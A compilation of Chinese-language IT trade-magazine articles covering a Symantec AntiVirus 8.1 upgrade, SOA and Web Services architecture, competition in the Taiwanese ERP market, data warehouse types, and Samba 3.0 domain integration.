銳傑科技提供幾個Symantec AntiVirus升級安裝的注意事項:
1.先了解企業內的作業系統及網路架構,並確認用戶端的系統需求符合要求。在升級前,管理者必須先檢查軟硬體是否合乎系統需求,特別是一些較舊的作業系統,不但作業系統廠商早已不支援,新的應用程式也可能無法支援,以Symantec AntiVirus 8.1為例,用戶端已經不支援Windows 95平臺。還好的是,Symantec AntiVirus 8.1能夠向下相容7.x版的用戶端,如果用戶端無法安裝8.x版,可以安裝7.6版,再由8.1版伺服器控管。
2.確認Windows NT/2000/XP/2003的使用者具備本機管理員權限。
3.防毒伺服器避免與郵件伺服器和資料庫伺服器安裝在同一臺機器上。因為郵件伺服器(Exchange和Notes)會接收到病毒信,可能會與防毒系統產生衝突;資料庫主機則有可能與Symantec AntiVirus本身的資料庫相衝突。
4.防毒伺服器避免安裝兩片(含)以上的網路卡。
5.防毒伺服器最好設定固定IP,並能透過DNS解析該伺服器,以方便用戶端由外部或跨網域連結。
6.若由Norton AntiVirus 7.x升級時,建議先移除再安裝Symantec AntiVirus 8.x,以便後續的管理。
7.在安裝防毒軟體時,有一個重要的注意事項,那就是關掉所有的程式,特別是Office軟體。
除了以上的注意事項,我們考量到幾個問題,經過專家的解答後,提出來與你分享:
原機升級或新機升級:由於iThome的員工人數並不多,所以廖竣生建議原機升級即可,但若企業的規模較大,或有擴編的打算,則要考量原先的伺服器是否能夠負擔。Symantec System Center、主控臺元件及Symantec AntiVirus伺服器可以安裝在同一臺伺服器上。
用戶端升級:如果要到每一臺機器前執行安裝,那MIS人員可能會抓狂。Symantec AntiVirus有5種用戶端安裝方式,包括Login Script、Web Install、Symantec System Center派送、Packager派送(MSI 2.0)及光碟安裝,除了最後一種,其他的方式都可以從遠端進行安裝。廖竣生表示,Login Script是最快也最簡單的安裝方式。如果該用戶已經安裝個人版防毒軟體,最好先手動移除再安裝用戶端軟體。
所佔硬碟空間與系統資源:通常新的應用程式會佔用較多的硬碟空間與系統資源,但由於8.x版的病毒碼處理方式不同,所以佔的硬碟空間反而比較少,林育民表示,7.x版約佔50MB、8.x版約34.6MB(拿掉Windows 3.1版的程式碼),即將上市的9.0版則只佔18.2MB;在系統資源方面,管理者可從主控臺調整,系統預設的掃描優先權是3,最高則為13,如果制定得過高,可能會影響到系統的整體效能。
備分與還原:新版本的功能增加,設定選項也越來越複雜,建議做好系統備分工作,以方便日後的還原。目前系統設定只能採用手動備份與還原,由使用者手動備分系統的機碼。
專業的顧問服務價值不斐
林育民表示,Symantec完整的防毒系統導入過程包含5個階段,從最初的評估環境、規畫、移除既有的解決方案、測試安裝(Pilot Test,在企業的真實環境進行測試)、執行及教育訓練。但原廠的顧問服務價格較高,臺灣大多由合作夥伴提供顧問諮詢服務,所以,iThome是向銳傑購買產品及授權,並提供相關的售後服務。
銳傑在協助企業進行建置時,也是遵循Symantec的規範,包括系統架構說明、安裝平臺確認、測試方式與移除方式、測試行程規畫及測試注意事項等內容。安裝過程約需1天,測試與訓練約7~14天。最後,在兩位專家的協助之下,iThome順利升級到Symantec AntiVirus 8.1。
後記
在iThome 3年的時間,筆者收到無數的病毒信,開過無數病毒檔,但從沒有感染過病毒,這完全歸功於防毒系統(把駭客工具隔離除外),但有些人未遵守公司的安全政策,可就沒這麼幸運了。
防毒仍是企業最大的困擾之一,加上病毒和蠕蟲發病的時間越來越短,除了制訂良好的安全政策,還要經過良好的規畫與建置,才能發揮防毒系統的最大功效。
SOA面面觀
SOA不是新的概念,卻因為Web Services的出現,舊瓶裝新酒而成了當紅炸子雞。然而,用得好,不如用得巧,雖然Web Services是平價的解決方案,卻不是萬靈丹,用對地方才能發揮SOA的效益。若盲目地「為Web Services而Web Services」的話,可有排頭吃了。
近兩年來SOA(Service-Oriented Architecture;服務導向的架構)是被資訊產業喊得震天價響的當紅炸子雞,事實上,SOA並不是新的概念,早在十幾年前DCOM及CORBA規格中的ORBs(Object Request Brokers)即SOA的應用。Gartner預計,到2006年將有超過 60%的企業,會考慮以SOA作為建立關鍵業務應用的基本原則。SOA及SODA(Service-Oriented Development of Application;服務導向的軟體開發模式)在未來幾年將逐漸成為主流。
Web之所以大行其道,鬆散藕合是關鍵
網際網路最初是為了分享學術及科學上的研究成果,第一份HTML網頁是由單純的文字與超連結組成,不久之後,內含圖形與其他多媒體資料的能力,很快地就被加到視覺化的Web身上。瀏覽器讓網際網路在短短幾年間,成為橫跨全球的資料庫。
然而,對企業而言,重要的商業資訊都儲存於資料庫而非文件中,隨著時間的演進,維護大量的靜態HTML網頁,將成為繁瑣的任務。因此CGI、ASP、JSP等動態網頁技術應運而生,網站成了資料查詢、線上交易等服務的提供者,開始執行應用程式的任務。當任務變得愈來愈重要,便出現新一代的中介軟體-應用伺服器,介於前端表現層及後端資訊系統之間,兼顧安全性、穩定性、可用性、延展性及效能等各方面要求,擔任執行商業邏輯的角色。
網際網路之所以成功,BEA技術經理蕭百齡認為:「遵循開放標準,帶來鬆散藕合(Loose Coupling)的模式是最重要的關鍵。」然而網路的應用必須依賴瀏覽器,又顯得被僵化地限制,因此人們開始思考更中立的方式,讓消費端可自行決定如何處理及呈現服務端所提供的資訊。
XML就是在這樣的時空背景下產生的技術,目的在於提供一個精準描述資料的機制,以彌補HTML太過著重資料呈現的特質。Web Services讓服務端提供的資訊,除了瀏覽器外,手機、IA家電、其他伺服器上的服務,甚至辦公室文書軟體都成了潛在的資訊消費者。
業務導向的組裝式系統
傳統應用導向開發的軟體,試圖在各個領域提供解決方案,產生ERP、CRM、SCM及PLM等,獨立、訊息不交流且難以整合的系統。然而量身訂作自行建置的成本過高,因此企業多選擇套裝的解決方案,再自行加以客製化。然而由於套裝系統的架構僵硬,缺乏變動的彈性,往往是使用者屈就系統功能,而非系統配合使用者的習慣,這也是導入系統時,容易遭遇使用者因習慣改變而反彈的原因。
「開發即整合,整合即開發」是SOA的新思維,顛覆傳統應用導向的思維,強調的「服務」是以業務為主軸,提供各項資訊基本應用功能,以拉近資訊系統與業務之間的距離,而著眼於貫穿資訊孤島,提供可排列組合的各項服務。
將系統功能模組轉換成各種服務後,透過BPM橫向貫穿ERP、CRM、SCM及PLM等,企業對內和對外各種系統,串連服務成為請採購等各類商業流程。未來業務需求或商業流程改變時,將保有調整的最佳彈性。
SODA也確保應用系統以先天即能互相整合的方式來設計,讓企業所開發的新應用系統能輕易地與其他系統整合,迅速藉由新的或現有的「服務」來建立組合式的應用系統,並賦予因應未來整合所需要的彈性。
臺灣IBM公司軟體事業處商業整合產品專員董俊賢說明:「SOA類似硬體IC的概念,再透過流程串連各種服務,組合成解決方案。」過去軟體設計無法實現IC模組的概念,是因為各家使用專屬的技術及規格,使得模組受到特定技術的箝制;而今在開放標準下,整合不再是夢想。
Services未必是Web 「Services」
要建構有效的SOA,必須先清楚了解「Service」這個專有名詞的意義,Service是一個定義明確且獨立運作的功能,且與其他Services的內容及狀態沒有相依性。
董俊賢強調:「SOA是架構性的概念,不能窄化SOA的定義,Services指的並不一定是Web Services。」Services是物件導向的延伸,過去SmallTalk、CORBA到後來微軟的DCOM及J2EE的EJB和JavaBean等都是SOA的應用。由於使用專屬的語言,所以無法互通,直到Web Services的出現,才露出整合的曙光。
DCOM是微軟執行遠端呼叫的專屬機制,雖然與Web Services同樣是跨語言的技術,卻僅支援Visual C++、Visual Basic及C#等語言,受到微軟平臺的綑綁,便限制了應用範圍。最新的.NET Remoting也是.NET平臺SOA的應用,但也僅限於.NET平臺。
事實上,CORBA與Web Services類似,擁有跨平臺及程式語言能力,且成熟度較高,但必須付出較高的學習成本。CORBA仰賴IDL解譯資料,但一般人難以理解IDL的內容,開發人員必須學習IDL,困難度因而成為阻礙發展的金箍咒,影響市場的接受度。相較之下Web Services的XML可讀性高,且多數開發Web Services的工具均可自動產生WSDL。再加上CORBA的架構必須在每個用戶端安裝IDL的解譯器,所以只適合企業內部網路的應用。
SOA大放異彩的原因,與XML及Web Services的成熟有絕對的關係,由於遵循開放標準,而帶來鬆散藕合的架構,SOA的架構將不再受到特定技術或產品緊密的綑綁。
BPM是串連服務的神經系統
在SOA的架構中,BPM(Business Process Management;企業流程管理)扮演串連各種服務形成企業流程或資訊流的角色,也可說是流程管理的解決方案,由流程模型建置、流程分析、流程模擬、流程執行、流程監控及流程管理等功能組成。但實現BPM未必需要搭配BPM產品,董俊賢強調:「BPM這個專有名詞,是為解決整合的問題而提出的概念,並非產品。」傳統以紙本傳遞,或土法煉鋼撰寫程式的方法,也是BPM的作法。套裝化BPM產品的目的,是為減少撰寫程式的負擔,並降低維護與管理的成本。
BPM若要成為SOA架構中,串連服務的神經系統,除了要支援Web Services,及提供連接既有系統的配接器之外,還必須使用相同的標準,BPM產品才有互通的可能。在戰國時代百家爭鳴的標準中,OASIS的BPEL是大家認為比較可能成為主流的標準。
不過企業仍然存有疑慮,即使各家BPM產品都支援BPEL,然而會不會上演類似J2EE的情況,在標準之外加入專屬的規格,因而破壞了相容性。蕭百齡表示:「各廠商或許有提供額外加值的功能,但最基本的相容性可以透過認證,確保跨BPM產品對 BPEL 格式匯出/匯入的相容性。」這就類似現在WS-I推的Basic Profile觀念,只要遵循指導方針,即可以產業標準為基礎,開發及建置具互通性的BPEL格式。
另一個擔憂是使用BPEL與合作夥伴串接流程,會不會洩露內部流程?事實上,只要遵循建置B2B流程的最佳實作,訂定Public和Private Processes,內部與外部的介面是完全隔開的。
SOA的好處
開發軟體時,建置健全的服務層,將帶來更好的投資報酬率。每個Service對應到明確的商業領域,當系統產生新的需求時,只需開發新的元件提供額外的服務。由於各項服務擁有明確的獨立性,所以其生命周期很有可能比最初的系統還長久。
SOA的Services位置必須透明,應用程式將Services以目錄管理,在執行階段才動態結合在一起。這樣的特性促使更好的延展性,因為負載平衡機制可在不知道Services用戶端的情況下,轉送要求到多個Instance。也因為這樣的透明度,可以在多臺伺服器的Instance建立相同的Services,如果部分網路或某臺伺服器出現問題,使用者的要求可重新指派到其他伺服器的Services,使得系統擁有更好的穩定性。
既然Services存放位置的透明度是SOA的特性,程式可攜性即可實現。用戶端無需在意服務的所在地點,因此企業可彈性地移動服務到不同的地方,甚至提供合作夥伴或客戶使用。
SOA促使應用程式分為多層式的架構,每一層都有專門的技術,開發人員將專業分工,負責應用程式不同部分。企業得利於不再過度仰賴高成本的獨門人才,可使用經驗較少的大眾人才。
以單一或主從架構建置系統,安全機制一般由前端處理,企業甚至沒有導入資料庫的安全控管機制,因為管理多重的安全機制太過困難。而一個服務可能提供多個應用程式使用,因此有獨立完整的安全機制,應用程式將有用戶端及服務端的雙重認證,可強化安全性。
Services有公開的介面可方便執行單元測試,開發人員可使用工具製作測試案例,以確認Services的獨立性可被任何應用程式使用。除錯是軟體考古學中相當困難的任務,藉由將商業邏輯集中於Services層,系統的可維護性將大幅提升,因為開發人員將更容易找到及更正錯誤的部分。
完整的測試通常意謂著更少的缺失及更好的品質。開發人員將逐漸建構一系列有用Services,企業將了解這些Services是可再利用資產,可以各種方式組裝,新的應用程式將因此而更快被開發出來。
程式碼的再利用是最常被討論的議題,然而由於程式語言及平臺的不相容,一直很難達成這個理想。元件及Services比較容易被再利用,開發人員不需要再煩惱編譯器的版本、平臺或其他可能影響的因素。
多層式的架構也代表可獨立作業,只要在專案開始時建立好介面溝通的契約,各層的開發人員可同時進行自各的開發工作,縮短開發時程。
.NET與Java在SOA方面的表現
微軟在Windows Server 2003上市的同時,也結合.NET Framework、IIS 6.0及Visual Studio .NET提出「應用伺服器」的解決方案。Visual Studio .NET是相當方便的Web Services開發工具,並強調獨門的C#及VB.NET語法簡捷且API完整,可強化開發導入的速度。在未來以Web Services為基礎開發的Longhorn作業系統,搭配.NET的Whitehorse及Indigo新套件,將提供更有效率的Web Services開發環境。
BEA WebLogic 8.1以應用伺服器為基礎平臺,結合Portal伺服器提供更好的使用者經驗;資料的彙整與管理也是重要的問題,Liquid Data是EII(Enterprise Information Integration;企業資料整合)解決方案,企業可透過標準XML查詢資料;企業內部與外部合作夥伴應用程式的整合,可透過BEA Integration Framework,以BPM、B2Bi及EAI解決方案完成。
過去WebLogic必須搭配Borland JBuilder,才能開發Web Services。WebLogic Workshop則是所有解決方案共同的開發平臺,自從前年推出第一代以來,被許多分析機構評為最簡單的Web Services開發工具。BEA認為J2EE就像DOS一樣,很重要卻也很枯燥,微軟的Windows作業系統之所以起飛的原因,就是因為高階圖形化的介面。不是每個人都需要學DOS,也不是每個人都需要了解艱澀難懂的J2EE,WorkShop即提供簡單容易使用的圖形使用者介面,即使一般使用者,也可利用WorkShop開發Web Services、設計Portal及組裝流程。
IBM則基於SOA整個架構,針對企業在資源整合方面,提出ESB (Enterprise Services Bus)架構,以提供企業在導入SOA架構時方便管理及提升效率的基礎架構。 在ESB下提供企業內部或外部不論在企業流程、資料或系統,透過企業入口網站、B2B或 Web Services加以整合。
IBM從2003年起開始將其相關的產品都加以提升支援ESB架構。在基於J2EE 架構WebSphere應用伺服器建構解決方案,MQ及WBI Borkers負責BPM的部分,再搭配入口網站伺服器、Web Services應用機制、WebSphere Business Integration為流程整合、DB2 Information Integrator是即時異質資料庫整合機制,及WebShpere Business Integration Adapters為B2B的配接器。
對於企業既有的系統,Siebel、SAP及Oracle等ERP系統目前都已支援Web Services,多數應用伺服器及BPM工具均提供配接器(Adapter),至於自行開發的系統,由於開發工具普遍支援Web Services,只要有繼續維護,都可透過工具將元件轉換成Web Services。
SOA對EDI與EAI的影響
過去企業透過EDI(Electronic Data Interchange;電子資料交換),運用協定的標準與資料格式,經電子化傳遞方式,與合作夥伴及客戶交換訊息。以EAI(Enterprise Application Integration)整合內部的系統,減少重複輸入的機會。當SOA出現後,對EDI及EAI會造成什麼樣的衝擊?
蕭百齡認為:「SOA 的精髓不是在取代什麼,而是要整合。」既有的EDI、EAI方式,及大型主機或ERP系統會繼續存在,但可以整合在SOA的架構之下。SOA可說是解決EAI課題的新方法,可取代舊式做法,而改以開放標準的Web services為溝通協定。董俊賢也表示:「SOA只是實作EDI及EAI的一種新的作法。」
臺灣微軟.NET顧問經理李啟後表示:「以SOA的架構串連企業應用程式,相較於傳統EAI的技術,是比較經濟的作法。」隨著時間的演進,SOA所帶來的好處與價值,將超越傳統EAI投資。BEA則認為:「SOA是EAI的進一步應用,若一開始就考慮SOA,未來就沒有整合的問題,而是彈性組裝的系統。」傳統EAI整合各自獨立的系統難度高,往往需要藉助顧問服務,導致成本太高。SOA可減少建置與維護的門檻,降低專業工匠的需求,提高效率並降低成本。
不過,Borland資深產品經理李匡正分析:「SOA很有機會取代傳統EDI的作法,但在EAI方面SOA並不是萬靈丹。」過去EDI建置的成本太高,無法普及到下游的廠商;而SOA是平價的EDI,且內建支援的開發工具較多,所以很有機會取代EDI。不過EAI屬於企業內部的資訊整合,是相當專業的領域,雖然SOA是低成本的EAI解決方案,但由於Web Services效能較差,除非是時效性要求不嚴苛的系統,否則Web Services的SOA架構不見得是最佳的解決方案。
SOA的關鍵原則
Web Services雖是最新SOA架構應用的實作,但正確的設計觀念與周詳的導入規畫才是SOA的關鍵。掌握使用Web Services的技巧,才能發揮潛在的價值,否則將適得其反。蕭百齡表示:「在實作和設計上必須把握關鍵原則:鬆散藕合和正確的顆粒大小。」
鬆散藕合白話文的意思就是立場中立,Web Services是異質系統溝通的介面,為避免被專屬技術緊密綑綁,或單方面調整時會衝擊雙方的溝通,介面要越中立越好。此外,中立的介面也進一步提升重複使用的機率,讓資源可以共享,增加開發的價值。
顆粒大小也是抽象的概念,SOA強調業務導向,與過去設計函式(Function)或方法(Method)小顆粒的作法不同,在設計上XML傳遞的資料內容,應朝向設計業務上有意義的單元。
由於適用Web Services的範圍、介面的長相及所謂顆粒大小的問題,是一門學問,而企業對SOA及Web Services的應用,目前並沒有清楚的概念與足夠的實際經驗,為避免「為Web Services而Web Services」,企業可能會尋求顧問服務。不過蕭百齡認為:「採用SOA架構,中大型企業會得利最多。」所以企業應不假外求,培養內部的建築師,組成專業的規畫團隊與業務單位充分溝通,才能有效降低專案失敗的機率。
用對地方才能發揮效益
根據Gartner Group的調查分析,J2EE將逐漸取代CORBA,這不代表CORBA就此消失,因為J2EE的規格中包含CORBA的架構,所以也可以說J2EE延續CORBA的應用;COM及COM+將逐漸由.NET取代,而.NET及J2EE的互通即透過Web Services。事實上,CORBA、DCOM也均有存在的價值,未來將存在於企業內部;Web Services則善長網際網路的溝通。
SOA舊瓶裝新酒,在近兩年成為當紅的技術名詞,無非是與Web Services的崛起有關,雖然Web Services目前仍不算成熟,不過以其公開標準、跨平臺、成本低廉及鬆散藕合的特性,將是促成SOA引領風騷的主因。
李啟後表示:「臺灣敏感的經濟型態,隨著全球趨勢脈動,企業特別需要SOA的架構,以因應靈活變動的需求。」企業的資訊系統需要更靈活的架構,以因應瞬息萬變的需求,才能發揮展現IT的價值。
不過,一窩蜂的趕流行,可能勞民傷財也不見得有好的效果。Web Services不是萬靈丹,用在對的地方才能發揮真正的效益,蕭百齡認為:「單一系統或語言的溝通,Web Services不見得是最好的候選人;跨企業、系統或程式語言的交流,Web Services便是優先考量。」當然企業也不能忽略效能問題,效能要求嚴苛的系統,可考慮其他解決方案。
ERP市場山雨欲來風滿樓?
和本土和外商亦敵亦友,微軟商用軟體吹皺一池春水,重兵群集中小企業,下半年戰火開打
面對微軟商用軟體ERP和CRM即將到來的威脅,多數本土商用軟體業者皆嚴陣以待,外商的態度雖老神在在,穩坐中大型市場寶座,從過去微軟在各應用軟體領域的「成功經驗」,以及市場資源的豐沛,大家也不得不擔心微軟從中小企業向上攻的可能性。多數業者認為,微軟商用軟體對臺灣市場會產生非常大的衝擊。
通用型ERP緊張,漢康老神在在
企業資源規畫(Enerprise Resource Planning,簡稱ERP)由物料管理(MRP)、生產、行銷、財務、人力資源等模組組成,已經是企業必備的資料處理系統之一,歷經20多年的發展,只要有其中一項產品就可稱為ERP廠商的數量多達數十家,產品重複性相當高,由於臺灣市場較小,每個ERP公司規模都不大。
漢康總經理吳金城指出,ERP可粗分成兩大類型,一種是依照行業別生態開發的解決方案,另外一種為適用於各種產業的通用型ERP,多數廠商開發的產品屬於後者。這類產品普及速度快,能獲取較高的利潤,但能提供的客製化程度低,客戶滿意度相對也不高。「微軟招牌太大,對市場影響一定很大,尤其是提供通用型ERP的廠商。」
吳金城說:「4到5年前,我們開始針對特定行業,深入研究和開發該行業別中不同類別的業務項目和流程,包括鞋業、紡織業、PCB光電、金屬加工、機械等。因此面對的市場競爭壓力較小,有特定的客源,收入來源也穩定,但不像通用型ERP以量取勝。」
ERP逐漸成熟,近幾年無論在技術或市場面新陳代謝速度緩慢,才有ERP已死之說。鉅茂專案經理呂婉玲說,這兩年ERP市場都起不來,微軟能入注新的想法,引進微軟的ERP或CRM產品,對臺灣商用軟體市場生態會有正面的刺激,尤其在功能和服務方面注入新氣象,可帶來新的商機。
ERP客戶家數居冠的鼎新則仍在觀察市場變化,對此並未做進一步回應。面對即將到來的殺戮戰場,鼎新日前進行組織調整,改過去產品別之分,依照產業別分成製造業、流通買賣業、金融及服務業、政府等部門。去年成績逆勢成長,表現超越前年,主要收入來自從ERP轉型到ERP II的整合服務市場。
昔日伙伴可能是今日敵人
思愛普和微軟原本是最佳的合作伙伴,然而,微軟併購位於歐洲的Great Plains和Navision,企圖將其商用軟體市場策略改從歐洲打回美國,讓這位德國商用軟體大廠心生戒心。除了針對中小企業流程需求的軟體外,Navision也提供大型製造業ERP方案,其產品在歐洲佔有率為3%,思愛普為37%,兩者相差甚鉅,但微軟的力量則不可小覷。
目前思愛普尚未在臺灣推中小企業套裝軟體SAP Business One,尚在評估是否今年推出。思愛普的Business One和微軟Navision ERP在歐洲中小企業市場正面廝殺。
思愛普解決方案服務伙伴之一、東捷資訊事業營運中心執行副總蔡正忠說,微軟看的是營業額1到5億元的企業,思愛普目標為營業額5到15億元的大型企業,需要嚴謹的客製工程,因應外在環境的變化。東捷以營運東元集團ERP的經驗,成為思愛普導入服務業務的合作伙伴,今年目標拿下非東元集團客戶6到8個。
和其他競爭產品的差異,蔡忠正指出,思愛普商用軟體架在業務流程平臺上,開發出來的ERP、CRM或SCM為業務導向的解決方案,其他競爭廠商的產品為功能導向的架構,修改彈性小,新的應用在既有軟體上疊床架屋,系統會相當複雜。「多數本土廠商和競爭對手的客戶都會面臨類似的問題,尤其是有多角貿易或兩岸三地運籌需求的企業。」
整合學問大,家家有本難唸的經
對於微軟的商用軟體強調功能多樣和快速導入的特點,甲骨文加值服務商前進國際總經理簡添勇認為:「拼100片和拼1000片,不是只有10倍的差距,每個模組之間的連動性和階層是次方的差距。整合學問大,大家解決的問題都不一樣。」他認為微軟的產品對本土ERP廠商影響較大,尚未影響到中大型企業這一塊。
除了平臺的客製化彈性外,顧問扮演專案成敗的關鍵角色。簡添勇強調:「顧問事業要長長久久,做10到15年才能和其他競爭者拉大距離。」他認為,今年ERP市場會比去年熱,而大者恆大的態勢會更明顯。
臺灣廠商西進潮將持續進行。和其他廠商一樣,漢康和前進國際都在考慮和大陸當地廠商合資,陸資企業才有機會拓展內陸市場。簡添勇說:「延續前幾年的西進潮,兩岸三地的整合系統需求升高。多數本土廠商的系統多因此受到侷限,汰換或升級的客戶不少。」
另外,因為仁科和J.D. Edwards正在進行組織合併,臺灣仁科總經理莊英俊對此不便發言。
目前Navision解決方案的導入服務是由港商瀚思資訊提供,臺灣微軟從去年也開始走訪伙伴和客戶端,查探民情。由於ERP市場幾近飽和,多數微軟合作廠商看到CRM的商機。另外,微軟認為,本土廠商5到6年前開發的產品,也慢慢要轉到.NET平臺,由於轉換成本高,多半影響更新意願。微軟承諾,以該平臺為基礎,將給予伙伴相關的技術服務和訓練,而合作伙伴專注於行業別的產業知識。
微軟和本土伙伴唇齒相依
微軟去年商用軟體收入有6億美元,到2010年目標100億美元,MIC資深分析師周樹林說,微軟進軍商用軟體市場的企圖,從2年前其併購Great Plains、Navision等廠商就可以看出端倪。然而,商用軟體和當地產業應用有密切相關,其中財會等模組也需要大量的本土化工程,微軟必須和本土加值經銷商(VAR)或顧問服務提供者合作,才會有機會。
根據MIC調查,2003年臺灣IT服務市場規模約1429億元,預估2004年達1500億元,將比去年成長5%,其中資訊安全解決方案佔比例仍是第一,去年成長率為28%,預估今年成長率達27%,電子商業應用成長幅度達12%。
大型企業自行建置比例高
根據MIC的調查,臺灣大型企業自行建置的比例偏高,若以家數來看,以鼎新平臺為基礎的比例最高,第二為甲骨文,第三才為思愛普,SCM排行第一也是鼎新,第二名才是i2,第三名是思愛普。而今年商用軟體市場的明星產品將是商業智慧,受訪的大企業中多數是採用微軟的BI,第二名為甲骨文,再者為IBM。
其中,有三分之一的企業自行開發ERP,自行開發SCM的企業比例高達54.3%,自行開發CRM的更高,比例為62.2%。周樹林指出,基於客製化需求、集團效益和資安考量,大企業寧願讓自己的資訊部門,擔任導入應用軟體的工作。
相較於全球大環境呈現衰退的數字,周樹林說,臺灣企業對於IT的投資仍非常積極,尤其是ERP或CRM等系統,若以2003年臺灣一千大企業來看,ERP普及率幾乎達飽和程度,其中有3成為自行開發;一千大企業中導入CRM的比例約68%,銷售排行前三名為Siebel、甲骨文和思愛普,預估到2006年普及率將高達77%。
除了ERP和CRM外,微軟還有支援企業營運面的工具軟體,包括SQL Server的線上分析程序(OLAP)、商業智慧(BI)工具等,這些產品強調簡單易用和價格低廉,受到不少企業歡迎,「微軟企業端產品整合起來的資源是相當驚人的。」周樹林強調:「現在微軟攻中小企業市場,其實距離中大型企業市場就不遠了。」
資料倉儲的類型
資料倉儲通常用作資料採礦、商業智慧,能夠包山包海,也可以處理單一主題
近年來企業e化已經不限於關心流程是否順暢,交易記錄完整儲存等單一系統的議題,往往更在意異質資訊系統間的整合,如何有效彙整與呈現資料,對企業營運效率的影響越來越具體。資料倉儲(Data Warehouse)的概念,即是引用倉庫儲存的概念,不僅儲存實體的原物料與成品,在資訊系統上也能夠將抽象的檔案資料統整,而且轉換成實體的資料倉儲。
資料庫、資料倉儲、資料倉儲系統的區別
資料倉儲是儲存大量資料的資料庫,與資料庫卻不盡然相同。資料庫儲存的資料與營運(Operation)相關,資料倉儲會在資料累積一段時間後,再整理、移轉至另一個資料系統中作資料分析。資料倉儲通常指的是儲存整合後資料的資料庫,資料倉儲系統則泛指整個決策輔助系統,包括系統的軟硬體、資料與報表。
「資料倉儲」這個名詞在西元1990年由Bill Inmon所創造出來的,因此被喻為資料倉儲之父,在「What is a Data Warehouse」書中,他認為資料倉儲的資料收集,有4種特性:主題導向的(subject-oriented)、經過整合的(integrated)、依循時間變動的(time-variant)、不會流失的(non-volatile),根據這些特性,使資料倉儲能夠將資料提供給決策管理系統進行處理。另一位資料倉儲的代表性人物Ralph Kimball,在「The Data Warehouse Toolkit」一書中認為,資料倉儲是一種經過結構化,可以查詢和分析的交易資料副本。
「主題導向」是說資料倉儲可以集中與特定主題相關的資訊,而不只是公司目前的營運資訊;「經過整合」是指存放在資料倉儲的資料是從不同的來源合併,並且維持一貫有條理;「依循時間變動」說明資料倉儲以特定的時間點辨識儲存的資料;「不會流失」則是表示資料倉儲中的資料只會持續增加,不會被移除,這能夠使管理階層得到企業商務持續性的觀察。
資料倉儲的類型
資料倉儲可分成企業資料倉儲(EDW)、操作型資料商店(Operational Data Store)和資料市集(Data Mart)。有的人又認為資料倉儲除了企業資料倉儲和資料市集外,還可以加上虛擬資料倉儲(Virtual Data Warehouse)、混合式倉儲(Hybrid Data Warehouse)。
企業資料倉儲。企業資料倉儲包含整個企業的資訊,由數個主題組成,例如客戶、產品、業務等面向,能夠用在決策支援,有即時資訊,也有彙總過的資訊。
操作型資料商店。「操作」,是相對於資料倉儲的資訊性而言,ODS提供明細資料,特別是經過統整的近期資料,能夠供應即時報表的需求,作業型資料商店只能分析很近期內的資料,無法分析較長期的歷史資料。Bill Inmon在1995年發表的「The Operational Data Store」他認為ODS的資料集合是主題導向的、經過整合的,不過與資料倉儲不同之處在於,ODS的資料會流失,以當下的數值為主,不含歷史與累計資料,而且ODS資料能夠做到即時的整合性蒐集。ODS根據資料同步更新的頻率,將資料的轉送與儲存時程也有等級之分。
資料市集。與資料倉儲的定義大致相同,資料倉儲涵蓋整個公司的資料與人員,而資料市集只包含特定範圍的資料,而且使用者會鎖定某一個工作群組的人員。一組資料市集可以組成一個企業資料倉儲,反之亦然。假設一個公司採取數個資料超市同時存在的模式,在定義相同維度的資料時發生歧異的狀況,將會使資料市集變成資料孤島(Data Island)。資料孤島對企業整體而言有很大的問題,整合的功用只限於部門群組,無法擴及整體資訊的統合,跨部門的資料分析無法進行,不同工作屬性無法連結的狀況下,如果有不同的跨部門資料分析,以往資料市集架構只能繼續以疊床架屋的方式累加,無法整合。
現今資料倉儲的建置,仍以資料市集開始居多,因為資料市集採用的維度模式比起個體關係模式容易理解,而且分析速度較快,不過仍應視企業與使用者的需求而定。
虛擬資料倉儲。企業直接使用現有營運的資料庫,並輔助一些中介工具,進行有效資料處理,建構較快速,成功的機會高,可做到即時資料分析。
混合式資料倉儲。資料市集如果以虛擬資料倉儲的方式表現,就變成混合式資料倉儲。需要的儲存空間比起企業資料倉儲少,由於資料已經儲存在一個經過正規化的資料環境,資料重組的過程會比透過應用程式讀取執行中的資料來得簡單,而且也不會影響執行中的資料庫。混合式資料倉儲也能夠應付資料市集遭遇到的資料孤島現象,透過虛擬的方式能夠彈性對應不同的需求。
資料倉儲的好處
資料倉儲可以做到跨資料來源的整合,使不同資料庫的資料彼此對應連結。資訊系統的建置,固然解決了資料定時產出與立即儲存的需求,一旦企業想要從資訊系統擷取經過整合後的各式統計資訊,立即面臨到資料來源不同的問題,無法跨系統同時存取,並且無法進一步自動化加工處理分析,資料倉儲可以視為提取資料的單一窗口,透過資訊系統自動化的轉換,以減少人工交換檔案出錯的可能性。
資料倉儲的發展,初期的僅需要總合資料的檢視,之後每一筆交易資料也開始保留在資料倉儲,以便分析客層與產品之間的關係。目前除了儲存總合資料和交易資料,也保留明細資料,分析顧客的購物。
這樣的歷史進程說明,企業過去只是想知道總營業額,現在則更關切顧客如何在交易流程做出選擇。
資料倉儲常會與資料採礦、商業智慧相提並論,當運用在行銷業務時,可以用來了解顧客習性,讓企業能夠預測顧客行為,以便進行適合的促銷;在企業內部,資料倉儲可以用在內部營運情形的評估,讓高階主管從具體的資料證據,找出營運狀況不佳的癥結點。
技術新知 -Samba 3.0增強網路整合管理功能
在Unix平臺上享有盛名的Samba於去年陸續推出3.0.x系列,能夠有效整合多種異質平臺的檔案共享功能,並增強企業內部網路的管理功能。Samba伺服器是許多儲存廠商在建置時的選擇,除了可以有效降低開發成本外,操作介面簡易,功能強大是頗受青睞的原因。
Samba 3.0系列依然保有這些優勢,並且加入了許多新功能,可作為AD網域的備分網域控制器(BDC)是其中最受人矚目的功能。
在之前的版本中,Samba伺服器雖然可以作為主要網域控制器或加入AD網域,但不是必須更改網路架構,就是沒有足夠的權限可以管理,必須重新建立帳號密碼才能使用。
3.0改版之後,就可藉由LDAP協定,向主要網域控制器(PDC)送出確認帳號密碼的要求,有效地整合網路環境,解決在同一網域中還需要多組帳號密碼的煩惱;除了可以融入Windows網路環境外,3.0還可以備分PDC中的帳號密碼,避免因為各種突發原因無法連線PDC而造成網域失常的問題。
以往Samba伺服器最讓人難以親近的就是管理複雜度,所有的設定檔都必須藉由文字介面完成,對現在的管理人員而言,是相當費時且複雜的事情,在3.0版中,搭配了新的SWAT,可以更快速且簡單地設定完成。
我們使用FreeBSD 5.1作業系統安裝Samba 3.0.1,並安裝相關套件,讓Samba伺服器可與AD網域整合,另外以一臺Windows Server 2003作為主要網域控制器。
